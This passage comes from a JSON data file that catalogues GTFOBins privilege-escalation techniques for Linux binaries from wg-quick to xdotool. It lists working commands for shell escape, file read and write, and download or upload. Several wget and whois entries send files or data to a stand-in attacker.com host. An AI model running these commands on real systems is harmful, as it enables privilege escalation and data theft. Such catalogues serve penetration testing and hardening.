/bin/sh\nEOF\n\nwg-quick up /path/to/temp-file.conf","description":"Use `wg-quick down /path/to/temp-file.conf` in order to be able to run the shell again.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wg-quick/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wget:download:0:sudo","toolId":"gtfo:wget","toolName":"wget","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"wget http://attacker.com/path/to/input-file -O /path/to/output-file","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wget:download:0:suid","toolId":"gtfo:wget","toolName":"wget","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"wget http://attacker.com/path/to/input-file -O /path/to/output-file","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/wget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wget:download:0:unprivileged","toolId":"gtfo:wget","toolName":"wget","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"wget http://attacker.com/path/to/input-file -O /path/to/output-file","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wget:file-read:0:sudo","toolId":"gtfo:wget","toolName":"wget","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"wget -i /path/to/input-file","description":"The file to be read is treated as a list of URLs, one per line, which are actually fetched by `wget`. The content appears, somewhat modified, as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wget:file-read:0:suid","toolId":"gtfo:wget","toolName":"wget","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"wget -i /path/to/input-file","description":"The file to be read is treated as a list of URLs, one per line, which are actually fetched by `wget`. The content appears, somewhat modified, as error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/wget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wget:file-read:0:unprivileged","toolId":"gtfo:wget","toolName":"wget","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"wget -i /path/to/input-file","description":"The file to be read is treated as a list of URLs, one per line, which are actually fetched by `wget`. The content appears, somewhat modified, as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wget:file-write:0:sudo","toolId":"gtfo:wget","toolName":"wget","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"wget -i /path/to/input-file -o /path/to/output-file","description":"The file to be read is treated as a list of URLs, one per line, which are actually fetched by `wget`. The content appears, somewhat modified, as error messages.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wget:file-write:0:suid","toolId":"gtfo:wget","toolName":"wget","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"wget -i /path/to/input-file -o /path/to/output-file","description":"The file to be read is treated as a list of URLs, one per line, which are actually fetched by `wget`. The content appears, somewhat modified, as error messages.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/wget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wget:file-write:0:unprivileged","toolId":"gtfo:wget","toolName":"wget","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"wget -i /path/to/input-file -o /path/to/output-file","description":"The file to be read is treated as a list of URLs, one per line, which are actually fetched by `wget`. The content appears, somewhat modified, as error messages.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wget:shell:0:sudo","toolId":"gtfo:wget","toolName":"wget","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo -e '#!/bin/sh\\n/bin/sh 1>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\nwget --use-askpass=/path/to/temp-file 0","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wget:shell:0:suid","toolId":"gtfo:wget","toolName":"wget","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo -e '#!/bin/sh -p\\n/bin/sh -p 1>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\nwget --use-askpass=/path/to/temp-file 0","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/wget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wget:shell:0:unprivileged","toolId":"gtfo:wget","toolName":"wget","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo -e '#!/bin/sh\\n/bin/sh 1>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\nwget --use-askpass=/path/to/temp-file 0","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wget:upload:0:sudo","toolId":"gtfo:wget","toolName":"wget","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"wget --post-file=/path/to/input-file http://attacker.com","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wget:upload:0:suid","toolId":"gtfo:wget","toolName":"wget","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"wget --post-file=/path/to/input-file http://attacker.com","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/wget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wget:upload:0:unprivileged","toolId":"gtfo:wget","toolName":"wget","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"wget --post-file=/path/to/input-file http://attacker.com","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wget:upload:1:sudo","toolId":"gtfo:wget","toolName":"wget","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"wget --post-data=DATA http://attacker.com","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wget:upload:1:suid","toolId":"gtfo:wget","toolName":"wget","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"wget --post-data=DATA http://attacker.com","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/wget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wget:upload:1:unprivileged","toolId":"gtfo:wget","toolName":"wget","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"wget --post-data=DATA http://attacker.com","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:whiptail:file-read:0:sudo","toolId":"gtfo:whiptail","toolName":"whiptail","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"whiptail --textbox --scrolltext /path/to/input-file 0 0","description":"The file is shown in an interactive TUI dialog made for displaying text, arrows can be used to scroll long content.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/whiptail/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:whiptail:file-read:0:suid","toolId":"gtfo:whiptail","toolName":"whiptail","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"whiptail --textbox --scrolltext /path/to/input-file 0 0","description":"The file is shown in an interactive TUI dialog made for displaying text, arrows can be used to scroll long content.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/whiptail/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:whiptail:file-read:0:unprivileged","toolId":"gtfo:whiptail","toolName":"whiptail","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"whiptail --textbox --scrolltext /path/to/input-file 0 0","description":"The file is shown in an interactive TUI dialog made for displaying text, arrows can be used to scroll long content.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/whiptail/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:whois:download:0:sudo","toolId":"gtfo:whois","toolName":"whois","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"whois -h attacker.com -p 12345 x","description":"Received data has instances of the `\\r` byte stripped.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/whois/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:whois:download:0:suid","toolId":"gtfo:whois","toolName":"whois","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"whois -h attacker.com -p 12345 x","description":"Received data has instances of the `\\r` byte stripped.","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/whois/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:whois:download:0:unprivileged","toolId":"gtfo:whois","toolName":"whois","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"whois -h attacker.com -p 12345 x","description":"Received data has instances of the `\\r` byte stripped.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/whois/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:whois:upload:0:sudo","toolId":"gtfo:whois","toolName":"whois","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"whois -h attacker.com -p 12345 DATA","description":"Data is converted to lower case, and has a trailing `\\r\\n`.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/whois/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:whois:upload:0:suid","toolId":"gtfo:whois","toolName":"whois","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"whois -h attacker.com -p 12345 DATA","description":"Data is converted to lower case, and has a trailing `\\r\\n`.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/whois/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:whois:upload:0:unprivileged","toolId":"gtfo:whois","toolName":"whois","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"whois -h attacker.com -p 12345 DATA","description":"Data is converted to lower case, and has a trailing `\\r\\n`.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/whois/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wireshark:file-write:0:sudo","toolId":"gtfo:wireshark","toolName":"wireshark","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"wireshark -c 1 -i lo -k -f 'udp port 12345' &\necho DATA | nc -u 127.127.127.127 12345","description":"This technique can be used to write arbitrary files, i.e., the dump of one UDP packet.\n\nAfter starting Wireshark, and waiting for the capture to begin, deliver the UDP packet, e.g., with `nc` (see below). The capture then stops and the packet dump can be saved:\n\n1. select the only received packet;\n\n2. right-click on \"Data\" from the \"Packet Details\" pane, and select \"Export Packet Bytes...\";\n\n3. choose where to save the packet dump.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wireshark/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wireshark:file-write:0:unprivileged","toolId":"gtfo:wireshark","toolName":"wireshark","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"wireshark -c 1 -i lo -k -f 'udp port 12345' &\necho DATA | nc -u 127.127.127.127 12345","description":"This technique can be used to write arbitrary files, i.e., the dump of one UDP packet.\n\nAfter starting Wireshark, and waiting for the capture to begin, deliver the UDP packet, e.g., with `nc` (see below). The capture then stops and the packet dump can be saved:\n\n1. select the only received packet;\n\n2. right-click on \"Data\" from the \"Packet Details\" pane, and select \"Export Packet Bytes...\";\n\n3. choose where to save the packet dump.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wireshark/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wireshark:inherit:0:sudo","toolId":"gtfo:wireshark","toolName":"wireshark","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"wireshark","description":"This requires GUI interaction. Start Wireshark, then from the main menu, select \"Tools\" -> \"Lua\" -> \"Evaluate\". A window opens that allows to execute Lua code.","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wireshark/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wireshark:inherit:0:unprivileged","toolId":"gtfo:wireshark","toolName":"wireshark","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"wireshark","description":"This requires GUI interaction. Start Wireshark, then from the main menu, select \"Tools\" -> \"Lua\" -> \"Evaluate\". A window opens that allows to execute Lua code.","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wireshark/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wish:inherit:0:sudo","toolId":"gtfo:wish","toolName":"wish","name":"inherit ← tclsh","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Reverse/Bind Shell","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:tclsh"],"command":"wish","mitre":["T1574","T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wish/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wish:inherit:0:suid","toolId":"gtfo:wish","toolName":"wish","name":"inherit ← tclsh","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Reverse/Bind Shell","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:tclsh"],"command":"wish","mitre":["T1574","T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/wish/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wish:inherit:0:unprivileged","toolId":"gtfo:wish","toolName":"wish","name":"inherit ← tclsh","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Reverse/Bind Shell","Execution"],"nativeCategory":["inherit","from:tclsh"],"command":"wish","mitre":["T1574","T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wish/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xargs:file-read:0:sudo","toolId":"gtfo:xargs","toolName":"xargs","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xargs -a /path/to/input-file -0","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xargs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xargs:file-read:0:suid","toolId":"gtfo:xargs","toolName":"xargs","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xargs -a /path/to/input-file -0","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xargs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xargs:file-read:0:unprivileged","toolId":"gtfo:xargs","toolName":"xargs","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"xargs -a /path/to/input-file -0","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xargs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xargs:shell:0:sudo","toolId":"gtfo:xargs","toolName":"xargs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"xargs -a /dev/null /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xargs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xargs:shell:0:suid","toolId":"gtfo:xargs","toolName":"xargs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"xargs -a /dev/null /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xargs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xargs:shell:0:unprivileged","toolId":"gtfo:xargs","toolName":"xargs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"xargs -a /dev/null /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xargs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xargs:shell:1:sudo","toolId":"gtfo:xargs","toolName":"xargs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"xargs -a /dev/null /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xargs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xargs:shell:1:suid","toolId":"gtfo:xargs","toolName":"xargs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"xargs -a /dev/null /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xargs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xargs:shell:1:unprivileged","toolId":"gtfo:xargs","toolName":"xargs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"xargs -a /dev/null /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xargs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xargs:shell:2:sudo","toolId":"gtfo:xargs","toolName":"xargs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo x | xargs -o -a /dev/null /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xargs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xargs:shell:2:suid","toolId":"gtfo:xargs","toolName":"xargs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo x | xargs -o -a /dev/null /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xargs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xargs:shell:2:unprivileged","toolId":"gtfo:xargs","toolName":"xargs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo x | xargs -o -a /dev/null /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xargs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xdg-user-dir:shell:0:sudo","toolId":"gtfo:xdg-user-dir","toolName":"xdg-user-dir","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"xdg-user-dir '}; /bin/sh #'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xdg-user-dir/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xdg-user-dir:shell:0:unprivileged","toolId":"gtfo:xdg-user-dir","toolName":"xdg-user-dir","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"xdg-user-dir '}; /bin/sh #'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xdg-user-dir/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xdotool:shell:0:sudo","toolId":"gtfo:xdotool","toolName":"xdotool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"xdotool exec --sync /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xdotool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xdotool:shell:0:suid","toolId":"gtfo:xdotool","toolName":"xdotool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"xdotool exec --sync /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xdotool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xdotool:shell:0:unprivileged","toolId":"gtfo:xdotool","toolName":"xdotool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"xdotool exec --sync /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xdotool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local 